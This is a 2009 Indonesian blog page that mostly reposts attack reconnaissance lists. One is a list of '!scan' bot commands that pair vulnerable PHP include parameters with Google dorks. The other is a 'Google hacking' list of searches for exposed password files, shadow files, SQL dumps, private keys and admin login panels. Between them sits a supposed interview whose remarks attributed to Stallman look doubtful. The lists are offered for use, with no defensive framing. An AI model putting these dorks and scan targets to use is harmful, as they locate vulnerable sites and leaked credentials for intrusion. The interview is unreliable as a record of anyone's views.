 !scan kalender.php?vis= allinurl:"kalender.php?vis="
 !scan kalender.php?vis= allinurl:".php?vis="
 !scan lang.php?arg= allinurl:.php?arg=
 !scan lang.php?arq= allinurl:.php?arq=
 !scan lang.php?lk= allinurl:".php?lk="
 !scan lang.php?ln= allinurl:.php?ln=
 !scan lang.php?subpage= allinurl:".php?subpage="
 !scan lang.php?subp= allinurl:".php?sub="
 !scan lang.php?subp= allinurl:".php?subp="
 !scan /lib/db/ez_sql.php?lib_path= ttCMS
 !scan /lib/db/ez_sql.php?lib_path= ttCMS <= v4
 !scan /lib/static/header.php?set_menu= iPhoto Album
 !scan /lib/static/header.php?set_menu= iPhotoAlbum
 !scan /lib/static/header.php?set_menu= iPhotoAlbum v1.1
 !scan link.php?do= allinurl:".php?do="
 !scan list.php?product= allinurl:.php?product=
 !scan list.php?table= allinurl:.php?table=
 !scan ln.php?ln= allinurl:.php?ln=
 !scan loc.php?l= allinurl:".php?l="
 !scan loc.php?l= allinurl:".php?loc="
 !scan loc.php?lang= allinurl:".php?lang="
 !scan loc.php?lang= allinurl:".php?loc="
 !scan loc.php?loc= allinurl:"loc.php?loc="
 !scan loc.php?loc= allinurl:".php?loc="
 !scan login.php?loca= .php?loca=
 !scan magazine.php?inc= allinurl:".php?inc="
 !scan main1.php?arg= allinurl:.php?arg=
 !scan main1.php?ln= allinurl:.php?ln=
 !scan main2.php?ln= allinurl:.php?ln=
 !scan main.html.php?seite= allinurl:.php?seite=
 !scan main.php3?act= allinurl:"main.php3?act="
 !scan main.php3?act= allinurl:".php3?act="
 !scan main.php5?page= .php5?id=
 !scan main.php?a= allinurl:".php?a="
 !scan main.php?arg= allinurl:.php?arg=
 !scan main.php?ba= allinurl:"main.php?ba="
 !scan main.php?ba= allinurl:".php?ba="
 !scan main.php?command= allinurl:"main.php?command="
 !scan main.php?command= allinurl:".php?command="
 !scan main.php?d1= allinurl:"main.php?d1="
 !scan main.php?d1= allinurl:".php?d1="
 !scan main.php?f1= allinurl:".php?f1="
 !scan main.php?fset= allinurl:".php?fset="
 !scan main.php?id= inurl:"main.php?id=*.php"
 !scan main.php?inc= allinurl:".php?inc="
 !scan main.php?ln= allinurl:.php?ln=
 !scan main.php?ltr= allinurl:".php?ltr="
 !scan main.php?s= allinurl:"main.php?s="
 !scan main.php?s= allinurl:main.php?s=
 !scan main.php?s= allinurl:.php?s=
 !scan main.php?s= allinurl:".php?s="
 !scan main.php?sit= allinurl:".php?sit="
 !scan main.php?table= allinurl:.php?table=
 !scan main.php?vis= allinurl:"main.php?vis="
 !scan main.php?vis= allinurl:main.php?vis=
 !scan main.php?vis= allinurl:".php?vis="
 !scan mai.php?act= allinurl:"mai.php?act="
 !scan mai.php?act= allinurl:mai.php?act=
 !scan mai.php?loc= allinurl:"mai.php?loc="
 !scan mai.php?loc= allinurl:mai.php?loc=
 !scan mai.php?src= allinurl:"mai.php?src="
 !scan mai.php?src= allinurl:mai.php?src=
 !scan map.php?loc= map.php?loc=
 !scan middle.php?file= inurl:"middle.php?file="
 !scan middle.php?file= inurl:"middle.php?page="
 !scan middle.php?file= inurl:".php?file="
 !scan middle.php?file= inurl:".php?page="
 !scan middle.php?file= middle.php?file=
 !scan middle.php?file= middle.php?page=
 !scan middle.php?file= .php?file=
 !scan middle.php?file= .php?page=
 !scan middle.php?page= inurl:"middle.php?page="
 !scan middle.php?page= inurl:".php?page="
 !scan middle.php?page= middle.php?page=
 !scan middle.php?page= .php?page=
 !scan misc.php?do= allinurl:".php?do="
 !scan mod.php?mod= allinurl:"mod.php?mod="
 !scan mod.php?mod= allinurl:".php?mod="
 !scan module.php?mod= allinurl:"module.php?mod="
 !scan module.php?mod= allinurl:".php?mod="
 !scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= allinurl:"PostGuestbook"
 !scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= inurl:"PostGuestbook"
 !scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= inurl:"PostGuestbook 0.6.1"
 !scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= "PostGuestbook"
 !scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook
 !scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook 0.6.1
 !scan modul.php?mod= allinurl:"modul.php?mod="
 !scan modul.php?mod= allinurl:".php?mod="
 !scan more.php?sub= "more.php?sub="
 !scan more.php?sub= more.php?sub=
 !scan nav.php?g= "nav.php?g="
 !scan nav.php?g= nav.php?g=
 !scan nav.php?go= "nav.php?go="
 !scan nav.php?go= nav.php?go=
 !scan nav.php?lk= allinurl:".php?lk="
 !scan nav.php?ln= allinurl:.php?ln=
 !scan nav.php?loc= nav.php
 !scan nav.php?loc= nav.php?loc=
 !scan nav.php?loc= .php?loc=
 !scan nav.php?nav= "nav.php?nav="
 !scan nav.php?nav= nav.php?nav=
 !scan nav.php?page= "nav.php?page="
 !scan nav.php?page= nav.php?page=
 !scan nav.php?pagina= "nav.php?pagina="
 !scan template.php?sekce=
 !scan down*.php?goFile=
 !scan blank.php?header=
 !scan start.php?body=
 !scan standard.php?body=
 !scan base.php?path=
 !scan base.php?module=
 !scan default.php?l=
 !scan principal.php?strona=
 !scan info.php?l=
 !scan template.php?left=
 !scan index2.php?texto=
 !scan home.php?eval=
 !scan padrao.php?section=
 !scan blank.php?goFile=
 !scan head.php?loc=
 !scan index.php?index=
 !scan page.php?ir=
 !scan print.php?path=
 !scan layout.php?ir=
 !scan blank.php?pollname=
 !scan down*.php?path=
 !scan include.php?x=
 !scan sitio.php?opcion=
 !scan pagina.php?category=
 !scan start.php?pageweb=
 !scan gallery.php?rub=
 !scan template.php?sp=
 !scan sub*.php?basepath=
 !scan press.php?menu=
 !scan standard.php?section=
 !scan enter.php?abre=
 !scan index2.php?pref=
 !scan index1.php?pa=
 !scan sitio.php?incl=
 !scan principal.php?seite=
 !scan show.php?ki=
 !scan gallery.php?chapter=
 !scan nota.php?qry=
 !scan pagina.php?pagina=
 !scan index3.php?x=
 !scan default.php?menu=
 !scan page.php?strona=
 !scan *inc*.php?open=
 !scan index3.php?secao=
 !scan standard.php?*[*]*=
 !scan default.php?abre=
 !scan template.php?basepath=
 !scan standard.php?goFile=
 !scan index2.php?ir=
 !scan file.php?modo=
 !scan gallery.php?itemnav=
 !scan main.php?oldal=
 !scan press.php?pg=
 !scan down*.php?showpage=
 !scan start.php?nivel=
 !scan start.php?destino=
 !scan index1.php?filepath=
 !scan blank.php?rub=
 !scan path.php?ir=
 !scan layout.php?var=
 !scan padrao.php?op=
 !scan mod*.php?pre=
 !scan index1.php?texto=
 !scan start.php?pg=
 !scan default.php?pa=
 !scan press.php?strona=
 !scan nota.php?cmd=
 !scan index1.php?showpage=
 !scan info.php?go=
 !scan standard.php?abre=
 !scan general.php?seccion=
 !scan index1.php?itemnav=
 !scan layout.php?seite=
 !scan path.php?load=
 !scan home.php?pollname=
 !scan path.php?left=
 !scan down*.php?inc=
 !scan index3.php?abre=
 !scan blank.php?where=
 !scan info.php?start=
 !scan include.php?channel=
 !scan print.php?dir=
 !scan pag
 Read More..
Diposting oleh
Jericho PS
Label:
SQLi,
SQLi dork
 
Kamis, 02 April 2009
di
03.59
 | 
 
 
PENJAJAHAN TERBALIKBERNARIDHO I. HUTABARAT (Business Intelligence Expert)
 
 Alkisah, RMS membaca tulisan saya “A Program is NOT like a recipe”.
 Kami bertemu empat mata dalam suatu kesempatan dan saya memakai
 kesempatan untuk mewawancarai orang yang sangat terkenal ini.
 
 SAYA SEPERTI orang berkepribadian ganda. Anti-Barat, tapi
 memakai produk dari Barat: jeans, Yahoo!, Google, Linux, dan
 mempropagandakan open source (yang notabene produk Barat).
 Berikut adalah petikan wawancaranya:
 BIH: Selamat pagi, senang bertemu Anda.
 RMS: Selamat pagi. Saya membaca tulisan Anda dan saya pikir
 tulisan tersebut tidak istimewa.
 BIH: Tidak apa-apa. Tapi, bagaimana kalau kita bicara hal yang
 lain saja?
 RMS: Okay. Saya dengar Anda beberapa kali berbicara tentang
 “Pintu gerbang kemerdekaan”. Apakah Anda merasa kami,
 orang-orang Barat sebagai penjajah?
 BIH: Ya.
 RMS: Analisis Anda dangkal. Tidakkah Anda lihat bahwa sudah
 terjadi penjajahan terbalik?
 BIH: Penjajahan terbalik?
 RMS: Ya. Penjajahan oleh negara berkembang terhadap negaranegara
 maju.
 BIH: Persisnya?
 RMS: Itu terjadi dalam bidang software. Kami bekerja keras
 untuk membuat Linux, banyak opened source-code software,
 dan memberikannya secara gratis. Negara-negara berkembang
 (dan melakukan pelanggaran HAM) seperti Nigeria dan China,
 menikmati hasilnya. Toh, rasa antipati masyarakat umum di
 negara-negara tersebut terhadap Barat dan Amerika tetap
 tinggi.
 BIH  : Mengapa disebut penjajahan?
 RMS: Pada penjajahan, pihak yang dijajah bekerja keras sementara
 pihak penjajah ongkang-ongkang kaki menerima hasilnya.
 Negara Barat membuat dan memperbaiki Linux, tetapi masyarakat
 negara berkembang tinggal menikmati hasil kerja tersebut.
 BIH  : Hmmm, benar.
 RMS: Banyak orang di negara berkembang tidak menyadari kelelahan
 dalam membuat, mendebat, dan memaparkan spesifi kasi.
 Banyak orang di negara berkembang tidak merasakan sakitnya
 menguji compliance suatu produk terhadap spesifi kasi. Mereka
 cuma menjadi pemimpin komunitas dan kolumnis seperti Anda,
 tapi tak membuat produk apapun.
 BIH : Tapi, bukankah Anda dan banyak programer lain menikmati
 pekerjaan yang painful dan “unpaid” tersebut?
 RMS: Ya (mengeluh nafas panjang), sayangnya begitu. Kadangkadang
 manusia menikmati hal yang menyakitkan.
 BIH  : Itu suatu penyakit psikologis?
 RMS: Saya tidak mau sebut demikian dan please jangan dibahas.
 BIH  : Apa yang Anda dan orang-orang Barat harus lakukan?
 RMS: Kami, orang-orang Amerika, Jepang, dan Eropa harus
 membangun jatidiri dan menghilangkan rasa bersalah berlebihan
 atas penjajahan di masa lalu. Penjajahan/tirani bisa (dan) dilakukan
 tidak hanya oleh Barat, tetapi juga oleh Timur. Jepang dan Malaysia
 adalah negara Timur. Jepang penjajah ekonomi dan Malaysia
 bersifat tiran. Penjajah tidak selalu orang Barat.
 BIH  : Ada contoh lain?
 RMS: OPEC. Kebanyakan negara OPEC bukan negara Barat, dan
 mereka suka mengkritik Barat dan AS. Tapi dalam hal software;
 secara praktis mereka boleh dikatakan tidak menyumbang apapun
 untuk kemajuan umat manusia di seluruh dunia. Mereka cuma mau
 enaknya memakai free software. Bill Gates menyumbang ke banyak
 orang tanpa memandang ras, agama, dan kebangsaan. Tapi,
 banyak individu kaya dari OPEC tidak berbuat hal yang sama.
 BIH : Bagaimana perasaan Anda tentang sikap anti-Amerika?
 RMS: Saya sedih dan marah membaca penilaian yang tidak adil terhadap
 Amerika. Saya yang memperjuangkan free software adalah
 warga Amerika. Free Software Foundation berkantor di Amerika,
 tapi membuat free software untuk dipakai manusia di seluruh dunia.
 Kalau mereka anti-Amerika berarti mereka juga antisaya.
 BIH : Pesan terakhir?
 RMS: Lebih mudah menghadapi Anda yang terus terang mengkritik
 Linux daripada menghadapi pendukung free software,
 tetapi diam-diam anti-Barat.
 BIH : Mr. Stallman, thank you.
 Read More..
Diposting oleh
Jericho PS
Label:
AS,
Linux,
penjajahan
 
Senin, 30 Maret 2009
di
05.13
 | 
 
 
Lagi browsing -browsing dapet di website http://it.toolbox.com/blogs/managing-infosec/google-hacking-master-list-28302
 Code:
 
 admin account info" filetype:log
 !Host=*.* intext:enc_UserPassword=* ext:pcf
 "# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
 "AutoCreate=TRUE password=*"
 "http://*:*@www" domainname
 "index of/" "ws_ftp.ini" "parent directory"
 "liveice configuration file" ext:cfg -site:sourceforge.net
 "parent directory" +proftpdpasswd
 Duclassified" -site:duware.com "DUware All Rights reserved"
 duclassmate" -site:duware.com
 Dudirectory" -site:duware.com
 dudownload" -site:duware.com
 Elite Forum Version *.*"
 Link Department"
 "sets mode: +k"
 "your password is" filetype:log
 DUpaypal" -site:duware.com
 allinurl: admin mdb
 auth_user_file.txt
 config.php
 eggdrop filetype:user user
 enable password | secret "current configuration" -intext:the
 etc (index.of)
 ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn
 ext:inc "pwd=" "UID="
 ext:ini eudora.ini
 ext:ini Version=4.0.0.4 password
 ext:passwd -intext:the -sample -example
 ext:txt inurl:unattend.txt
 ext:yml database inurl:config
 filetype:bak createobject sa
 filetype:bak inurl:"htaccess|passwd|shadow|htusers"
 filetype:cfg mrtg "target
 filetype:cfm "cfapplication name" password
 filetype:conf oekakibbs
 filetype:conf slapd.conf
 filetype:config config intext:appSettings "User ID"
 filetype:dat "password.dat"
 filetype:dat inurl:Sites.dat
 filetype:dat wand.dat
 filetype:inc dbconn
 filetype:inc intext:mysql_connect
 filetype:inc mysql_connect OR mysql_pconnect
 filetype:inf sysprep
 filetype:ini inurl:"serv-u.ini"
 filetype:ini inurl:flashFXP.ini
 filetype:ini ServUDaemon
 filetype:ini wcx_ftp
 filetype:ini ws_ftp pwd
 filetype:ldb admin
 filetype:log "See `ipsec --copyright"
 filetype:log inurl:"password.log"
 filetype:mdb inurl:users.mdb
 filetype:mdb wwforum
 filetype:netrc password
 filetype:pass pass intext:userid
 filetype:pem intext:private
 filetype:properties inurl:db intext:password
 filetype:pwd service
 filetype:pwl pwl
 filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
 filetype:reg reg +intext:â? WINVNC3â?
 filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
 filetype:sql "insert into" (pass|passwd|password)
 filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
 filetype:sql +"IDENTIFIED BY" -cvs
 filetype:sql password
 filetype:url +inurl:"ftp://" +inurl:";@"
 filetype:xls username password email
 htpasswd
 htpasswd / htgroup
 htpasswd / htpasswd.bak
 intext:"enable password 7"
 intext:"enable secret 5 $"
 intext:"EZGuestbook"
 intext:"Web Wiz Journal"
 intitle:"index of" intext:connect.inc
 intitle:"index of" intext:globals.inc
 intitle:"Index of" passwords modified
 intitle:"Index of" sc_serv.conf sc_serv content
 intitle:"phpinfo()" +"mysql.default_password" +"Zend s?ri?ting Language Engine"
 intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
 intitle:index.of administrators.pwd
 intitle:Index.of etc shadow
 intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
 intitle:rapidshare intext:login
 inurl:"calendars?ri?t/users.txt"
 inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
 inurl:"GRC.DAT" intext:"password"
 inurl:"Sites.dat"+"PASS="
 inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
 inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
 inurl:"wvdial.conf" intext:"password"
 inurl:/db/main.mdb
 inurl:/wwwboard
 inurl:/yabb/Members/Admin.dat
 inurl:ccbill filetype:log
 inurl:cgi-bin inurl:calendar.cfg
 inurl:chap-secrets -cvs
 inurl:config.php dbuname dbpass
 inurl:filezilla.xml -cvs
 inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
 inurl:nuke filetype:sql
 inurl:ospfd.conf intext:password -sample -test -tutorial -download
 inurl:pap-secrets -cvs
 inurl:pass.dat
 inurl:perform filetype:ini
 inurl:perform.ini filetype:ini
 inurl:secring ext:skr | ext:pgp | ext:bak
 inurl:server.cfg rcon password
 inurl:ventrilo_srv.ini adminpassword
 inurl:vtund.conf intext:pass -cvs
 inurl:zebra.conf intext:password -sample -test -tutorial -download
 LeapFTP intitle:"index.of./" sites.ini modified
 master.passwd
 mysql history files
 NickServ registration passwords
 passlist
 passlist.txt (a better way)
 passwd
 passwd / etc (reliable)
 people.lst
 psyBNC config files
 pwd.db
 server-dbs "intitle:index of"
 signin filetype:url
 spwd.db / passwd
 trillian.ini
 wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
 [WFClient] Password= filetype:ica
 intitle:"remote assessment" OpenAanval Console
 intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
 "bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com
 "Emergisoft web applications are a part of our"
 "Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
 "HostingAccelerator" intitle:"login" +"Username" -"news" -demo
 "iCONECT 4.1 :: Login"
 "IMail Server Web Messaging" intitle:login
 "inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com
 "intitle:3300 Integrated Communications Platform" inurl:main.htm
 "Login - Sun Cobalt RaQ"
 "login prompt" inurl:GM.cgi
 "Login to Usermin" inurl:20000
 "Microsoft CRM : Unsupported Browser Version"
 "OPENSRS Domain Management" inurl:manage.cgi
 "pcANYWHERE EXPRESS Java Client"
 "Please authenticate yourself to get access to the management interface"
 "please log in"
 "Please login with admin pass" -"leak" -sourceforge
 CuteNews" "2003..2005 CutePHP"
 DWMail" password intitle:dwmail
 Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com
 Midmart Messageboard" "Administrator Login"
 Monster Top List" MTL numrange:200-
 UebiMiau" -site:sourceforge.net
 "site info for" "Enter Admin Password"
 "SquirrelMail version" "By the SquirrelMail development Team"
 "SysCP - login"
 "This is a restricted Access Server" "Javas?ri?t Not Enabled!"|"Messenger Express" -edu -ac
 "This section is for Administrators only. If you are an administrator then please"
 "ttawlogin.cgi/?action="
 "VHCS Pro ver" -demo
 "VNC Desktop" inurl:5800
 "Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com
 "WebExplorer Server - Login" "Welcome to WebExplorer Server"
 "WebSTAR Mail - Please Log In"
 "You have requested access to a restricted area of our website. Please authenticate yourself to continue."
 "You have requested to access the management functions" -.edu
 (intitle:"Please login - Forums
 UBB.threads")|(inurl:login.php "ubb")
 (intitle:"Please login - Forums
 WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")
 (intitle:"rymo Login")|(intext:"Welcome to rymo") -family
 (intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")
 (inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil
 4images Administration Control Panel
 allintitle:"Welcome to the Cyclades"
 allinurl:"exchange/logon.asp"
 allinurl:wps/portal/ login
 ASP.login_aspx "ASP.NET_SessionId"
 CGI:IRC Login
 ext:cgi intitle:"control panel" "enter your owner password to continue!"
 ez Publish administration
 filetype:php inurl:"webeditor.php"
 filetype:pl "Download: SuSE Linux Openexchange Server CA"
 filetype:r2w r2w
 intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
 intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
 intext:"Mail admins login here to administrate your domain."
 intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
 intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
 intext:"Storage Management Server for" intitle:"Server Administration"
 intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
 intext:"vbulletin" inurl:admincp
 intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
 intitle:"Admin Login" "admin login" "blogware"
 intitle:"Admin login" "Web Site Administration" "Copyright"
 intitle:"AlternC Desktop"
 intitle:"Athens Authentication Point"
 intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net
 intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co
 intitle:"ColdFusion Administrator Login"
 intitle:"communigate pro * *" intitle:"entrance"
 intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
 intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
 intitle:"Dell Remote Access Controller"
 intitle:"Docutek ERes - Admin Login" -edu
 intitle:"Employee Intranet Login"
 intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."
 intitle:"ePowerSwitch Login"
 intitle:"eXist Database Administration" -demo
 intitle:"EXTRANET * - Identification"
 intitle:"EXTRANET login" -.edu -.mil -.gov
 intitle:"EZPartner" -netpond
 intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
 intitle:"i-secure v1.1" -edu
 intitle:"Icecast Administration Admin Page"
 intitle:"iDevAffiliate - admin" -demo
 intitle:"ISPMan : Unauthorized Access prohibited"
 intitle:"ITS System Information" "Please log on to the SAP System"
 intitle:"Kurant Corporation StoreSense" filetype:bok
 intitle:"ListMail Login" admin -demo
 intitle:"Login -
 Easy File Sharing Web Server"
 intitle:"Login Forum
 AnyBoard" intitle:"If you are a new user:" intext:"Forum
 AnyBoard" inurl:gochat -edu
 intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
 intitle:"Login to Cacti"
 intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
 intitle:"MailMan Login"
 intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
 intitle:"Merak Mail Server Web Administration" -ihackstuff.com
 intitle:"microsoft certificate services" inurl:certsrv
 intitle:"MikroTik RouterOS Managing Webpage"
 intitle:"MX Control Console" "If you can't remember"
 intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
 intitle:"Novell Web Services" intext:"Select a service and a language."
 intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
 intitle:"OnLine Recruitment Program - Login"
 intitle:"Philex 0.2*" -s?ri?t -site:freelists.org
 intitle:"PHP Advanced Transfer" inurl:"login.php"
 intitle:"php icalendar administration" -site:sourceforge.net
 intitle:"php icalendar administration" -site:sourceforge.net
 intitle:"phpPgAdmin - Login" Language
 intitle:"PHProjekt - login" login password
 intitle:"please login" "your password is *"
 intitle:"Remote Desktop Web Connection" inurl:tsweb
 intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
 intitle:"SHOUTcast Administrator" inurl:admin.cgi
 intitle:"site administration: please log in" "site designed by emarketsouth"
 intitle:"Supero Doctor III" -inurl:supermicro
 intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!"
 intitle:"teamspeak server-administration
 intitle:"Tomcat Server Administration"
 intitle:"TOPdesk ApplicationServer"
 intitle:"TUTOS Login"
 intitle:"TWIG Login"
 intitle:"vhost" intext:"vHost . 2000-2004"
 intitle:"Virtual Server Administration System"
 intitle:"VisNetic WebMail" inurl:"/mail/"
 intitle:"VitalQIP IP Management System"
 intitle:"VMware Management Interface:" inurl:"vmware/en/"
 intitle:"VNC viewer for Java"
 intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
 intitle:"WebLogic Server" intitle:"Console Login" inurl:console
 intitle:"Welcome Site/User Administrator" "Please select the language" -demos
 intitle:"Welcome to Mailtraq WebMail"
 intitle:"welcome to netware *" -site:novell.com
 intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
 intitle:"xams 0.0.0..15 - Login"
 intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
 intitle:"XMail Web Administration Interface" intext:Login intext:password
 intitle:"Zope Help System" inurl:HelpSys
 intitle:"ZyXEL Prestige Router" "Enter password"
 intitle:"inc. vpn 3000 concentrator"
 intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
 intitle:asterisk.management.portal web-access
 intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
 intitle:Group-Office "Enter your username and password to login"
 intitle:ilohamail "
 IlohaMail"
 intitle:ilohamail intext:"Version 0.8.10" "
 IlohaMail"
 intitle:IMP inurl:imp/index.php3
 intitle:Login * Webmailer
 intitle:Login intext:"RT is ? Copyright"
 intitle:Node.List Win32.Version.3.11
 intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
 intitle:open-xchange inurl:login.pl
 intitle:Ovislink inurl:private/login
 intitle:phpnews.login
 intitle:plesk inurl:login.php3
 inurl:"/admin/configuration. php?" Mystore
 inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
 inurl:"1220/parse_xml.cgi?"
 inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
 inurl:":10000" intext:webmin
 inurl:"Activex/default.htm" "Demo"
 inurl:"calendar.asp?action=login"
 inurl:"default/login.php" intitle:"kerio"
 inurl:"gs/adminlogin.aspx"
 inurl:"php121login.php"
 inurl:"suse/login.pl"
 inurl:"typo3/index.php?u=" -demo
 inurl:"usysinfo?login=true"
 inurl:"utilities/TreeView.asp"
 inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp
 
 Code:
 
 nurl:/admin/login.asp
 inurl:/cgi-bin/sqwebmail?noframes=1
 inurl:/Citrix/Nfuse17/
 inurl:/dana-na/auth/welcome.html
 inurl:/eprise/
 inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net
 inurl:/modcp/ intext:Moderator+vBulletin
 inurl:/SUSAdmin intitle:"Microsoft Software upd?t? Services"
 inurl:/webedit.* intext:WebEdit Professional -html
 inurl:1810 "Oracle Enterprise Manager"
 inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
 inurl::2082/frontend -demo
 inurl:administrator "welcome to mambo"
 inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
 inurl:cgi-bin/ultimatebb.cgi?ubb=login
 inurl:Citrix/MetaFrame/default/default.aspx
 inurl:confixx inurl:login|anmeldung
 inurl:coranto.cgi intitle:Login (Authorized Users Only)
 inurl:csCreatePro.cgi
 inurl:default.asp intitle:"WebCommander"
 inurl:exchweb/bin/auth/owalogon.asp
 inurl:gnatsweb.pl
 inurl:ids5web
 inurl:irc filetype:cgi cgi:irc
 inurl:login filetype:swf swf
 inurl:login.asp
 inurl:login.cfm
 inurl:login.php "SquirrelMail version"
 inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
 inurl:mewebmail
 inurl:names.nsf?opendatabase
 inurl:ocw_login_username
 inurl:orasso.wwsso_app_admin.ls_login
 inurl:postfixadmin intitle:"postfix admin" ext:php
 inurl:search/admin.php
 inurl:textpattern/index.php
 inurl:WCP_USER
 inurl:webmail./index.pl "Interface"
 inurl:webvpn.html "login" "Please enter your"
 Login ("
 Jetbox One CMS â?¢" | "
 Jetstream ? *")
 Novell NetWare intext:"netware management portal version"
 Outlook Web Access (a better way)
 PhotoPost PHP Upload
 PHPhotoalbum Statistics
 PHPhotoalbum Upload
 phpWebMail
 Please enter a valid password! inurl:polladmin
 
 INDEXU
 Ultima Online loginservers
 W-Nailer Upload Area
 intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
 "#mysql dump" filetype:sql
 "#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
 "allow_call_time_pass_reference" "PATH_INFO"
 "Certificate Practice Statement" inurl:(PDF | DOC)
 "Generated by phpSystem"
 "generated by wwwstat"
 "Host Vulnerability Summary Report"
 "HTTP_FROM=googlebot" googlebot.com "Server_Software="
 "Index of" / "chat/logs"
 "Installed Objects Scanner" inurl:default.asp
 "MacHTTP" filetype:log inurl:machttp.log
 "Mecury Version" "Infastructure Group"
 "Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
 "Most Submitted Forms and s?ri?ts" "this section"
 "Network Vulnerability Assessment Report"
 "not for distribution" confidential
 "not for public release" -.edu -.gov -.mil
 "phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
 "phpMyAdmin" "running on" inurl:"main.php"
 "produced by getstats"
 "Request Details" "Control Tree" "Server Variables"
 "robots.txt" "Disallow:" filetype:txt
 "Running in Child mode"
 "sets mode: +p"
 "sets mode: +s"
 "Thank you for your order" +receipt
 "This is a Shareaza Node"
 "This report was generated by WebLog"
 ( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
 (intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")
 (intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
 (inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
 +":8080" +":3128" +":80" filetype:txt
 +"HSTSNR" -"netop.com"
 -site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp
 94FBR "ADOBE PHOTOSHOP"
 AIM buddy lists
 allinurl:/examples/jsp/snp/snoop.jsp
 allinurl:cdkey.txt
 allinurl:servlet/SnoopServlet
 cgiirc.conf
 cgiirc.conf
 contacts ext:wml
 data filetype:mdb -site:gov -site:mil
 exported email addresses
 ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential
 ext:asp inurl:pathto.asp
 ext:ccm ccm -catacomb
 ext:CDX CDX
 ext:cgi inurl:editcgi.cgi inurl:file=
 ext:conf inurl:rsyncd.conf -cvs -man
 ext:conf NoCatAuth -cvs
 ext:dat bpk.dat
 ext:gho gho
 ext:ics ics
 ext:ini intext:env.ini
 ext:jbf jbf
 ext:ldif ldif
